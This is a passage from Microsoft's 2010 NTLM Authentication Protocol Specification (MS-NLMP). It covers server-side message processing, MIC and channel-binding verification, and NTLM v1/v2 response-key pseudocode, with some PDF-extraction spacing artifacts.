Set ClientSigningKey to SIGNKEY(NegFlg, ExportedSessionKey, "Client")  
Set ServerSigningKey to SIGNKEY(NegFlg, ExportedSessionKey, "Server")  
Set ClientSealingKey to SEALKEY(NegFlg, ExportedSessionKey, "Client")  
Set ServerSealingKey to SEALKEY(NegFlg, ExportedSessionKey, "Server")  
 
 
RC4Init(ClientHandle, ClientSealingKey)  
RC4Init(ServerHandle, ServerSealingKey)  
 
Set MIC to HMAC_MD5(ExportedSessionKey, ConcatenationOf(  
   NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE, AUTHENTICATE_MESSAGE))  
Set AUTHENTICATE_MESSAGE.MIC to MIC  
 
If the CHALLENGE_MESSAGE TargetInfo  field (section 2.2.1.2 ) has an MsvAvTimestamp present, 
the client SHOULD provide a MIC: <42>  
If there is an AV_PAIR  structure (section 2.2.2.1 ) with the AvId  field set to MsvAvFlags,  
then in the Value  field, set bit 0x2 to 1.  
else add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to MsvAvFla gs and the 
Value  field bit 0x2 to 1.  
Populate the MIC field with the MIC.  
The client SHOULD send the channel binding AV_PAIR <43> : 
If the CHALLENGE_MESSAGE contains a TargetInfo  field (section 2.2.1.2 )  
If the ClientChannelBindingsUnhashed (section 3.1.1.2 ) is not NULL  
Add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to 
MsvAvChannelBindings and the Value  field to 
MD5_HASH(ClientChannelBindingsUnhashed).  
Else add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to 
MsvAvChannelBindings and the Value  field to Z(16).  
 
48 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  If ClientSuppliedTargetName (section 3.1.1.2 ) is not NULL  
Add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to MsvAvTargetN ame 
and the Value  field to ClientSuppliedTargetName without terminating NULL.  
Else add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to 
MsvAvTargetName and the Value  field to an empty strin g without terminating NULL.  
When this process is complete, the client MUST send the AUTHENTICATE_MESSAGE to the server, 
embedded in an application protocol message, and encoded as specified by that application protocol.  
3.1.5.2   Connectionless  
The client action for connectionless NTLM authentication is similar to that of connection -oriented 
authentication (section 3.1.5.1 ). However, the first message sent in connectionless authentication is 
the CHALLENGE_MESSAGE  from the server to the client; there is no client -initiated 
NEGOTIATE_MESSAGE  as in the connection -oriented authentication.  
The message processing for connectionless NTLM authentication <44>  is as specified in the following 
sections.  
3.1.5.2.1   Client Receives a CHALLENGE_MESSAGE  
When the client receives a CHALLENGE_MESSAGE , it MUST produce a challenge response and an 
encrypted session key . The client MUST send the negotiated features (flags), the user name, the 
user's domain, the client part of the challenge, the challenge response, and the encrypted session 
key to the server. This message is sent to the server as an AUTHENTICATE_MESSAGE . 
If the ClientBlocked == TRUE and targ_name ( [RFC2743]  Section 2.2.1) does not equal any of the 
ClientBlockExceptions server names, then the NTLM c lient MUST return STATUS_NOT_SUPPORTED 
to the client application. <45>  
If NTLM v2 authentication is used and the CHALLENGE_MESSAGE contains a TargetInfo  field, the 
client SHOULD NOT send the LmChallengeResponse  field and SHOULD set th e 
LmChallengeResponseLen  and LmChallenResponseMaxLen  fields in the 
AUTHENTICATE_MESSAGE to zero. <46>  
If NTLM v2 authentication is used, the client SHOULD send the timestamp in the  
AUTHENTICATE_MESSAGE. <47>  
If there exists a CHALLENGE_MESSAGE.NTLMv2_CLIENT_CHALLENGE.AvId ==  
MsvAvTimestamp  
     Set Time to CHALLENGE_MESSAGE.TargetInfo.Value of the AVPair  
ELSE 
     Set Time to Currenttime  
Endif 
 
If the CHALLENGE_MESSAGE TargetInfo  field (section 2.2.1.2 ) has an MsvAvTimestamp present, 
the client SHOULD provide a MIC <48> : 
If there is an AV_PAIR  structure (section 2.2.2.1 ) with the AvId  field set to MsvAvFlags,  
then in the Value  field, set bit 0x2 to 1.  
 
49 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  else add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to MsvAvFlags and the 
Value field bit 0x2 to 1.  
Populate the MIC field with the MIC, where  
Set MIC to HMAC_MD5(ExportedSessionKey, ConcatenationOf(  
     CHALLENGE_MESSAGE, AUTHENTICATE_MESSAGE))  
The client SHOULD send the channel binding AV_PAIR <49> : 
If the CHALLENGE_MESSAGE contains a TargetInfo  field (section 2.2.1.2 )  
If the ClientChannelBindingsUnhashed (section 3.1.1.2 ) is not NULL  
Add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to 
MsvAvChannelBindings and the Value  field to 
MD5_HASH(ClientChannelBindingsUnhashed).  
Else add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to 
MsvAvChannelBindings and the Value  field to Z(16).  
If ClientSuppliedTargetName (section 3.1.1.2 ) is not NULL  
Add an AV_PA IR structure (section 2.2.2.1 ) and set the AvId  field to MsvAvTargetName 
and the Value  field to ClientSuppliedTargetName without terminating NULL.  
Else add an AV_PAIR structure (section 2.2.2.1 ) and set the AvId  field to 
MsvAvTargetName and the Value  field to an empty string without terminating NULL.  
When this process is complete, the client MUST send the AUTHENTICATE_MESSAGE to the server, 
embedded in an a pplication protocol message, and encoded as specified by that application protocol.  
3.1.6   Timer Events  
None.  
3.1.7   Other Local Events  
None.  
3.2   Server Details  
3.2.1   Abstract Data Model  
The following sections specify variables that are internal to the server and are maintained across the 
NTLM authentication sequence.  
3.2.1.1   Variables Internal to the Protocol  
The server maintains all of the variables that the client does (section 3.1.1.1 ) except the 
ClientConfigFlags . 
Additionally, the server maintains the following:  
 
50 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  CfgFlg : The set of server configuration flags (section 2.2.2.5 ) that specify the full set of capabilities 
of the server.  
DnsDomainName : A string that indic ates the fully qualified domain name (FQDN (2)) of the 
server's domain.  
DnsForestName : A string that indicates the FQDN (2) of the server's forest.  
DnsMachineName : A string that indicates the FQDN (1) of the server.  
NbDomainName : A string that indicates th e NetBIOS name of the user's domain.  
NbMachineName : A string that indicates the NetBIOS machine name of the server.  
The following NTLM server configuration variables are internal to the client and impact all 
authenticated sessions:  
ServerBlock : A Boolean s etting that disables the server from generating challenges and responding 
to NTLM_NEGOTIATE messages. <50>  
ServerRequire128bitEncryption : A Boolean setting that requires the server to use 128 -bit 
encryption. <51>  
3.2.1.2   Variables Exposed to the Application  
The server also maintains the ClientSuppliedTargetName variable (section 3.1.1.2 ). 
The following parameters are provided by the application to the NTLM server:  
Datagram:  A Boolean setting which indicates that the connectionless mode of NTLM is to be used. 
If the Datagram option is selected by the server, connectionless mode is used, and NTLM performs a 
bitwise OR operation with the following NTLM Negotiate bit flags into the CfgFlg internal variable:  
NTLMSSP_NEGOTIATE_DATAGRAM.  
ServerChannelBindingsUnhashed : An octet string provided by the application used for channel 
binding. This value is optional. <52>  
ApplicationRequiresCBT : A Boolean setting which indicates the application requires channel 
binding. <53>  
3.2.2   Timers  
None.  
3.2.3   Initialization  
The sequence number is set to zero.  
3.2.4   Higher -Layer Triggered Events  
The application server initiates NTLM authentication through the SSPI, the Microsoft implementation 
of GSS -API [RFC2743] . 
GSS_Accept_sec_context  
 
51 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  The server application calls GSS_Accept_sec_context() to establish a security context with the 
client. NTLM has no requirements on which flags are used and will simply honor what was 
requested by the application or protocol. For an example of such a protoc ol specification, see 
[MS-RPCE]  section 3.3.1.5.2.2. The server application will send the CHALLENGE_MESSAGE 
(section 2.2.1.2 ) to the client application.  
GSS_Wrap  
After the secur ity context is established, the server application can call GSS_WrapEx() (section 
3.4.6) to encrypt messages.  
GSS_Unwrap  
Once the security context is established, the server application can call GSS_Unwrap Ex() (section 
3.4.7) to decrypt messages that were encrypted by GSS_WrapEx.  
GSS_GetMIC  
Once the security context is established, the server application can call GSS_GetMICEx() (section 
3.4.8) to sign messages, producing an NTLMSSP_MESSAGE_SIGNATURE structure whose fields 
are defined in section 2.2.2.9 . 
GSS_VerifyMIC  
Once the security context is established , the server application can call GSS_VerifyMICEx() 
(section 3.4.9) to verify a signature produced by GSS_GetMICEx().  
3.2.5   Message Processing Events and Sequencing Rules  
The server -side processing of messages can happen in response to two different messages from the 
client:  
The server receives a NEGOTIATE_MESSAGE  from the client (the server responds with a 
CHALLENGE_MESSAGE ). 
The server receives an AUTHENTICATE_MESSAGE  from the client (the server verifies the clie nt's 
authentication information that is embedded in the message).  
3.2.5.1   Connection -Oriented  
Message processing on the server takes place in the following two cases:  
Upon receipt of the embedded NEGOTIATE_MESSAGE , the server extracts and decodes the 
NEGOTIATE_MESSAGE.  
Upon receipt of the embedded AUTHENTICATE_MESSAGE , the server extracts and decodes the 
AUTHENTICATE_MESSAGE.  
These two cases are described in the fo llowing sections.  
3.2.5.1.1   Server Receives a NEGOTIATE_MESSAGE from the Client  
Upon receipt of the embedded NEGOTIATE_MESSAGE , the server MUST extract and decode the 
NEGOTIATE_MESSAGE.  
If ServerBlock == TRUE, then the server MUST return STATUS_NOT_SUPPORTED. <54>  
 
52 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  If the security features selected by the client are not strong enough for the server security policy, 
the server MUST return an error to the calling applic ation. Otherwise, the server MUST respond with 
a CHALLENGE_MESSAGE  message. This includes the negotiated features and a 64 -bit (8 -byte) 
nonce value for the ServerChallenge value. The nonce is a pseudo -random number generated by the 
server and intended for one -time use. The flags returned as part of the CHALLENGE_MESSAGE in 
this step indicate which variant the server wants to use and whether the server's domain name or 
machine name are present in the TargetN ame field. 
If ServerRequire128bitEncryption == TRUE, then if 128 -bit encryption is not negotiated then the 
server MUST return SEC_E_UNSUPPORTED_FUNCTION to the application.  
The server processes the NEGOTIATE_MESSAGE and constructs a CHALLENGE_MESSAGE per the 
following pseudocode where all strings are encoded as RPC_UNICODE_STRING ( [MS-DTYP]  section 
2.3.6).  
-- Input: 
--   CfgFlg - Defined in section 3.2.1.  
--   An NTLM NEGOTIATE_MESSAGE whose message fields are defined in  
     section 2.2.1.1.  
-- 
-- Output: 
--   An NTLM CHALLENGE_MESSAGE whose message fields are defined in  
     section 2.2.1.2.  
-- 
-- Functions used:  
--   AddAVPair(), NIL, NONCE - Defined in section 6.  
The server SHOULD return only the capabilities it supports. F or example, if a newer client requests 
capability X and the server only supports capabilities A -U, inclusive, then the server does not return 
capability X. The CHALLENGE_MESSAGE NegotiateFlags  field SHOULD <55>  be set to the 
following:  
All the flags set in CfgFlg (section 3.2.1.1 ) 
The supported flags requested in the NEGOTIATE_MESSAGE.NegotiateFlags field  
NTLMSSP_REQUEST_TARGET  
NTLMSSP_NEGOTIATE_NTLM  
NTLMSSP_NEGOTIATE_ALWAYS_SIGN  
The Signature  field MUST be set to the string, "NTLMSSP". The MessageType  field MUST be set to 
0x00000002, indicating a message type of NtLmChallenge. The ServerChallenge  field MUST be set 
to an 8 -byte nonce.  
If the NTLMSSP_NEGOTIATE_VERSION flag is set, the Version field MUST be set to the current 
version (section 2.2.2.10 ). 
 
If (NTLMSSP_NEGOTIATE_UNICODE is set in NEGOTIATE.NegotiateFlags)  
     Set the NTLMSSP_NEGOTIATE_UNICODE flag in  
     CHALLENGE_MESSAGE.NegotiateFlags  
ElseIf (NTLMSSP_NEGOTIATE_OEM flag is set in NEGOTIATE.NegotiateFlag)  
     Set the NTLMSSP_NEGOTIATE_OEM flag in  
     CHALLENGE_MESSAGE.NegotiateFlags  
 
53 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  EndIf 
If (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is set i n 
NEGOTIATE.NegotiateFlags)  
     Set the NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag in  
     CHALLENGE_MESSAGE.NegotiateFlags  
ElseIf(NTLMSSP_NEGOTIATE_LM_KEY flag is set in  
NEGOTIATE.NegotiateFlag)  
     Set the NTLMSSP_NEGOTIATE_LM_KEY flag in  
     CHALLENGE_MESSAGE.NegotiateFlags  
EndIf 
 
If (Server is domain joined)  
     Set CHALLENGE_MESSAGE.TargetName to NbDomainName  
     Set the NTLMSSP_TARGET_TYPE_DOMAIN flag in  
     CHALLENGE_MESSAGE.NegotiateFlags  
Else   
     Set CHALLENGE_MESSAGE.TargetName  to NbMachineName  
     Set the NTLMSSP_TARGET_TYPE_SERVER flag in  
     CHALLENGE_MESSAGE.NegotiateFlags  
EndIf 
 
Set the NTLMSSP_NEGOTIATE_TARGET_INFO flag in  
CHALLENGE_MESSAGE.NegotiateFlags  
 
If (NbMachineName is not NIL)  
     AddAvPair(TargetInfo, MsvAvNbComputerName, NbMachineName)  
EndIf 
If (NbDomainName is not NIL)  
     AddAvPair(TargetInfo, MsvAvNbDomainName, NbDomainName)  
EndIf 
If (DnsMachineName is not NIL)  
     AddAvPair(TargetInfo, MsvAvDnsComputerName, DnsMachineNa me) 
EndIf 
If (DnsDomainName is not NIL)  
     AddAvPair(TargetInfo, MsvAvDnsDomainName, DnsDomainName)  
EndIf 
If (DnsForestName is not NIL)  
     AddAvPair(TargetInfo, MsvAvDnsTreeName, DnsForestName)  
EndIf 
AddAvPair(TargetInfo, MsvAvEOL, NIL)  
When this proce ss is complete, the server MUST send the CHALLENGE_MESSAGE to the client, 
embedded in an application protocol message, and encoded according to that application protocol.  
3.2.5.1.2   Server Receives an AUTHENTICATE_MESSAGE from the Client  
Upon receipt of the embedded AUTHENTICATE_MESSAGE , the server MUST extract and decode the 
AUTHENTICATE_MESSAGE.  
If ServerBlock == TRUE, then the server MUST return STATUS_NOT_SUPPORTED. <56>  
The server obtains the response key  by looking up the user name in a database. With the NT and 
LM responses keys and the client challen ge, the server computes the expected response. If the 
expected response matches the actual response, then the server MUST generate session, signing, 
and sealing keys; otherwise, it MUST deny the client access.  
 
54 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  The keys MUST be computed with the following a lgorithm where all strings are encoded as 
RPC_UNICODE_STRING ( [MS-DTYP]  section 2.3.6).  
-- Input:     
--   CHALLENGE_MESSAGE.ServerChallenge - The ServerChallenge field  
     from the server CHALLENGE_MESSAGE in section 3.2.5.1. 1 
--   NegFlg - Defined in section 3.1.1.  
--   ServerName - The NETBIOS or the DNS name of the server.  
--   An NTLM NEGOTIATE_MESSAGE whose message fields are defined  
     in section 2.2.1.1.  
--   An NTLM AUTHENTICATE_MESSAGE whose message fields are defin ed  
     in section 2.2.1.3.  
---  An NTLM AUTHENTICATE_MESSAGE whose message fields are  
     defined in section 2.2.1.3 with the MIC field set to 0.  
--   OPTIONAL ServerChannelBindingsUnhashed - Defined in  
     section 3.2.1.2  
-- 
-- Output:      Result of authentication  
--    ClientHandle - The handle to a key state structure corresponding  
--    to the current state of the ClientSealingKey  
--    ServerHandle - The handle to a key state structure corresponding  
--    to the current state of the ServerSealingK ey 
--    The following NTLM keys generated by the server are defined in  
      section 3.1.1:  
--    ExportedSessionKey, ClientSigningKey, ClientSealingKey,  
      ServerSigningKey, and ServerSealingKey.  
-- 
-- Temporary variables that do not pass over the wire are defined  
      below: 
--    KeyExchangeKey, ResponseKeyNT, ResponseKeyLM, SessionBaseKey -  
      Temporary variables used to store 128 -bit keys.  
--    MIC - message integrity for the NTLM NEGOTIATE _MESSAGE,  
      CHALLENGE_MESSAGE and AUTHENTICATE_MESSAGE  
--    MessageMIC - Temporary variable used to hold the original value of  
      the MIC field to compare the computed value.  
--    Time - Temporary variable used to hold the 64 -bit current time in  
      the AUTHENTICATE_MESSAGE.ClientChallenge, in the format of a  
      FILETIME as defined in [MS -DTYP] section 2.3.1.  
--    ExpectedNtChallengeResponse - Temporary variable to hold results  
      returned from Compute Response.  
--    ExpectedLmChallengeR esponse - Temporary variable to hold results  
      returned from Compute Response.  
-- 
-- Functions used:  
--    ComputeResponse - Defined in section 3.3  
--    KXKEY, SIGNKEY, SEALKEY - Defined in sections 3.4.5, 3.4.6, and  
      3.4.7  
--    GetVersion(), N IL - Defined in section 6  
 
Retrieve the ResponseKeyNT and ResponseKeyLM from the local user  
account database using the UserName and DomainName specified in the  
AUTHENTICATE_MESSAGE.  
 
Set ExpectedNtChallengeResponse, ExpectedLmChallengeResponse,  
SessionB aseKey to ComputeResponse(NegFlg, ResponseKeyNT,  
ResponseKeyLM, CHALLENGE_MESSAGE.ServerChallenge,  
AUTHENTICATE_MESSAGE.ClientChallenge, Time, ServerName)  
 
Set KeyExchangeKey to KXKEY(SessionBaseKey,  
 
55 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  AUTHENTICATE_MESSAGE.LmChallengeResponse)  
If (AUTHENTICATE_MESSAGE.NtChallengeResponse is NOT EQUAL to  
ExpectedNtChallengeResponse)  
   If AUTHENTICATE_MESSAGE.LmChallengeResponse !=  
             ExpectedLmChallengeResponse  
      Return INVALID message error  
   EndIf 
EndIf 
 
Set MessageMIC to AUTHE NTICATE_MESSAGE.MIC  
Set AUTHENTICATE_MESSAGE.MIC to Z(16)  
 
If (NTLMSSP_NEGOTIATE_KEY_EXCH flag is set in NegFlg )  
    Set ExportedSessionKey to RC4K(KeyExchangeKey,  
    AUTHENTICATE_MESSAGE.EncryptedRandomSessionKey)  
    Set MIC to HMAC_MD5(ExportedSessio nKey, ConcatenationOf(  
        NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE,  
        AUTHENTICATE_MESSAGE))  
Else  
Set ExportedSessionKey to KeyExchangeKey     
Set MIC to HMAC_MD5(KeyExchangeKey, ConcatenationOf(  
        NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE,  
        AUTHENTICATE_MESSAGE))  
EndIf 
Set ClientSigningKey to SIGNKEY(NegFlg, ExportedSessionKey , "Client")  
Set ServerSigningKey to SIGNKEY(NegFlg, ExportedSessionKey , "Server")  
Set ClientSealingKey to SEALKEY(NegFlg, ExportedSessionKey , "Client")  
Set ServerSealingKey to SEALKEY(NegFlg, ExportedSessionKey , "Server")  
 
 
RC4Init(ClientHandle, ClientSealingKey)  
RC4Init(ServerHandle, ServerSealingKey)  
 
 
If NTLM v2 authentication is used and channel binding is provided by the application, then the 
server MUST verify the channel binding <57> : 
If ServerChannelBindingsUnhashed (section 3.2.1.2 ) is not NULL  
If the AUTHENTICATE_MESSAGE contains a nonzero MsvAvChannelBindings AV_PAIR  
If MD5_HASH(ServerChannelBindingsUnhashed) != MsvAvChannelBindings.AvPair.Value)  
The server MUST return GSS_S_BAD_BINDINGS  
Else the server MUST return GSS_S_BAD_ BINDINGS  
Else If ApplicationRequiresCBT (section 3.2.1.2 ) == TRUE  
If the AUTHENTICATE_MESSAGE does not contain a nonzero MsvAvChannelBindings 
AV_PAIR  
The server MUST return GSS_S_BAD_BINDINGS  
If the AUTHE NTICATE_MESSAGE contains a MsvAvTargetName  
AvID == MsvAvTargetName  
 
56 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Value == ClientSuppliedTargetName  
If the AUTHENTICATE_MESSAGE indicates the presence of a MIC field,<58>  then the MIC value 
computed earlier MUST be compared to Messag eMIC, and if the two MIC values are not equal, then 
an authentication failure MUST be returned. An AUTHENTICATE_MESSAGE indicates the presence of 
a MIC field if the TargetInfo  field has an AV_PAIR structure whose two fields:  
AvId == MsvAvFlags  
Value bit 0x 2 == 1  
If NTLM v2 authentication is used and the 
AUTHENTICATE_MESSAGE.NtChallengeResponse.TimeStamp (section 2.2.2.7 ) is more than 
MaxLifetime  (section 3.1.1.1 ) difference from the server time, then the server SHOULD return a 
failure. <59>  
Both the client and the server now have the session, signing, and sealing keys. When the client runs 
an integrity check on the next message from the server, it detects that the server has determined 
(either directly or indirectly) the user password.  
3.2.5.2   Connectionless NTLM  
The server action for connectionless NTLM authentication is similar to that of connection -oriented 
authentication (section 3.1.5.1 ). However, the first message sent in connectionless authentication is 
the CHALLENGE_MESSAGE from the server to the client; there is no client -initiated 
NEGOTIATE_MESSAGE as in the connection -oriented authentication.  
The message processing for connectionle ss NTLM authentication <60>  is as specified in the following 
sections.  
3.2.5.2.1   Server Sends the Client an Initial CHALLENGE_MESSAGE  
The server MUST send a set of supported features and a random key to use as part of the challenge. 
This key is in the form of a 64 -bit (8 -byte) nonce  value for the ServerChallenge value. The nonce is 
a pseudo -random number generated by the server and intended for one -time use. The 
connectionless variant always uses key exchange, so the NTLMSSP_NEGOTIATE_KEY_EXCH flag 
MUST be set in the required flags m ask. The client SHOULD determine the set of supported features 
and whether those meet minimum security requirements. This message is sent to the client as a 
CHALLENGE_MESSAGE . 
3.2.5.2.2   Server Response Checking  
If ServerBlock == TRUE, then the server MUST return STATUS_NOT_SUPPORTED. <61>  
If ServerRequire128bitEncryption == TRUE, then if 128 -bit encryption is not negotiated then the 
server MUST return SEC_E_UNSUPPORTED_FUNCTION to the application. <62>  
The client MUST compute the expected session key for signing and en cryption, which it sends to the 
server in the AUTHENTICATE_MESSAGE (section 3.1.5.2.1 ). Using this key from the 
AUTHENTICATE_MESSAGE, the server MUST check the signature and/or decrypt the protocol 
respons e, and compute a response. The response MUST be signed and/or encrypted and sent to the 
client.  
  Set MIC to HMAC_MD5(ResponseKeyNT, ConcatenationOf(  
     CHALLENGE_MESSAGE, AUTHENTICATE_MESSAGE))  
 
57 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  If the AUTHENTICATE_MESSAGE  indicates the presence of a MIC field,<63>  then the MIC value 
computed earlier MUST be compared to the MIC field in the message, and if the two MIC values are 
not equal, then an authentication failure MUST be retur ned. An AUTHENTICATE_MESSAGE indicates 
the presence of a MIC field if the TargetInfo  field has an AV_PAIR structure whose two fields:  
AvId == MsvAvFlags  
Value bit 0x2 == 1  
If (NTLMSSP_NEGOTIATE_KEY_EXCH flag is set in NegFlg )  
    Set ExportedSessionKey to  RC4K(KeyExchangeKey,  
    AUTHENTICATE_MESSAGE.EncryptedRandomSessionKey)  
    Set MIC to HMAC_MD5(ExportedSessionKey, ConcatenationOf(  
        NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE,  
        AUTHENTICATE_MESSAGE))  
Else  
    Set MIC to HMAC_MD5(KeyExchangeKe y, ConcatenationOf(  
        NEGOTIATE_MESSAGE, CHALLENGE_MESSAGE,  
        AUTHENTICATE_MESSAGE))  
Endif 
 
If NTLM v2 authentication is used and the 
AUTHENTICATE_MESSAGE.NtChallengeResponse.TimeStamp (section 2.2.2.7 ) is more than 
MaxLifetime  (section 3.1.1.1 ) difference from the server time, then the server SHOULD return a 
failure. <64>  
If NTLM v2 authentication is used and channel bindin g is provided by the application, then the 
server MUST verify the channel binding <65> :  
If ServerChannelBindingsUnhashed (section 3.2.1.2 ) is not NULL  
If the AUTHENTICATE_MESSAGE contains a nonzero MsvAvChannelBindings AV_PAIR  
If MD5_HASH(ServerChannelBindingsUnhashed) != MsvAvChannelBindings.AvPair.Value)  
The server MUST return GSS_S_BAD_BINDINGS  
Else the server MUST return GSS_S_BAD_BINDINGS  
Else If ApplicationRequiresCBT (section 3.2.1.2 ) == TRUE  
If the AUTHENTICATE_MESSAGE does not contain a nonzero MsvAvChannelBindings 
AV_PAIR  
The server MUST return GSS_S_BAD_BINDINGS  
If the AUTHENTICATE_M ESSAGE contains a MsvAvTargetName  
AvID == MsvAvTargetName  
Value == ClientSuppliedTargetName  
3.2.6   Timer Events  
None.  
 
58 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  3.2.7   Other Local Events  
None.  
3.3   NTLM v1 and NTLM v2 Messages  
This section provides further details about how the client and server compute the responses 
depending on whether NTLM v1 or NTLM v2 is used. It also includes details about the NTOWF() and 
LMOWF()  functions whose output is subsequently used to compute the response.  
3.3.1   NTLM v1 Authentication  
The following pseudocode defines the details of the algorithms used to calculate the keys used in 
NTLM v1 authentication.  
Note   The LM and NTLM authentication versions are not negotiated by the protocol. It MUST be 
configured on both the client and the server prior to authentication. The NTOWF v1 function defined 
in this section is NTLM version -dependent and is used only by NTLM v1 . The LMOWF v1 function 
defined in this section is also version -dependent and is used only by LM and NTLM v1.  
The NT and LM response keys MUST be encoded using the following specific one -way functions 
where all strings are encoded as RPC_UNICODE_STRING ( [MS-DTYP]  section 2.3.6).  
-- Explanation of message fields and variables:  
--   ClientChallenge - The 8-byte challenge message generated by  
     the client.  
--   LmChallengeResponse - The LM response to the server challenge.  
     Computed by the client.  
--   NegFlg, User, UserDom - Defined in section 3.1.1.  
--   NTChallengeResponse - The NT response to the server challenge.  
     Computed by the client.  
--   Passwd - Password of the user. If the password is longer than  
     14 characters, then the LMOWF v1 cannot be computed.  For LMOWF  
     v1, if the password is shorter than 14 characters, it is padded  
     by appending zeroes.  
--   ResponseKeyNT - Temporary variable to hold the results of  
     calling NTOWF().  
--   ResponseKey LM - Temporary variable to hold the results of  
     calling LMGETKEY.  
--   CHALLENGE_MESSAGE.ServerChallenge - The 8-byte challenge message  
     generated by the server.  
-- 
-- Functions Used:  
--   Z(M)- Defined in section 6.  
 
Define NTOWFv1(Passwd, User, UserDom) as MD4(UNICODE(Passwd))  
EndDefine  
 
Define LMOWFv1(Passwd, User, UserDom) as  
       ConcatenationOf( DES( UpperCase( Passwd)[0..6],"KGS!@#$%"),  
                 DES( UpperCase( Passwd)[7..13],"KGS!@#$%"))  
EndDefine  
 
Set ResponseKeyNT to NTOWFv1(Passwd, User, UserDom)  
Set ResponseKeyLM to LMOWFv1( Passwd, User, UserDom )  
 
Define ComputeResponse(NegFlg, ResponseKeyNT, ResponseKeyLM,  
 
59 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  CHALLENGE_MESSAGE.ServerChallenge, ClientChallenge, Time, ServerName)  
As 
If (LM authent ication)  
     Set NtChallengeResponseLen to 0  
    Set NtChallengeResponseMaxLen to 0  
    Set NtChallengeResponseBufferOffset to 0  
    Set LmChallengeResponse to DESL(ResponseKeyLM,  
        CHALLENGE_MESSAGE.ServerChallenge)  
ElseIf (NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY flag is set in NegFlg)  
    Set NtChallengeResponse to DESL(ResponseKeyNT,  
    MD5(ConcatenationOf(CHALLENGE_MESSAGE.ServerChallenge,  
    ClientChallenge))[0..7])  
    Set LmChallengeResponse to Concatena tionOf{ClientChallenge,  
    Z(16)} 
Else  
    Set NtChallengeResponse to DESL(ResponseKeyNT,  
    CHALLENGE_MESSAGE.ServerChallenge)  
    If (NoLMResponseNTLMv1 is TRUE)  
        Set LmChallengeResponse to NtChallengeResponse  
    Else  
        Set LmChallengeResponse to DESL(ResponseKeyLM,  
        CHALLENGE_MESSAGE.ServerChallenge)  
    EndIf 
EndIf 
 
Set SessionBaseKey to MD4(NTOWF)  
 
On the server, if the user account to be authenticated is hosted in Active Dir ectory , the challenge -
response pair MUST be sent to the DC to verify ( [MS-APDS]  section 3.1.5).  
The DC calculates the expected value of the response using the NTOWF v1 and/or LMOWF v1, and 
matches it against the response provide d. If the response values match, it MUST send back the 
SessionBaseKey; otherwise, it MUST return an error to the calling application. The server MUST 
return an error to the calling application if the DC returns an error. If the DC returns 
STATUS_NTLM_BLOCK ED, then the server MUST return STATUS_NOT_SUPPORTED.  
If the user account to be authenticated is hosted locally on the server, the server calculates the 
expected value of the response using the NTOWF v1 and/or LMOWF v1 stored locally, and matches 
it agains t the response provided. If the response values match, it MUST calculate KeyExchangeKey; 
otherwise, it MUST return an error to the calling application. <66>  
3.3.2   NTLM v2 Authentication  
The following pseudocode defines the details of the algorithms used to calculate the keys used in 
NTLM v2 authentication.  
Note   The NTLM authentication version is not negotiated by the protocol. It MUST be configured on 
both the client and the server prior to authentication. The NTOWF v2 and LMOWF v2 functions 
defined in this section are NTLM version -dependent and are used only by NTLM v2.  
The NT and LM response keys MUST be encoded using the following specific one -way functions 
where all strings are encoded as RPC_UNICODE_STRING ( [MS-DTYP]  section 2.3.6).  
-- Explanation of message fields and variables:  
--   NegFlg, User, UserDom - Defined in section 3.1.1.  
 
60 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  --   Passwd - Password of the user.  
--   LmChallengeResponse - The LM response to the server challenge.  
     Computed by the client.  
--   NTChallengeResponse - The NT response to the server challenge.  
     Computed  by the client.  
--   ClientChallenge - The 8-byte challenge message generated by the  
     client.  
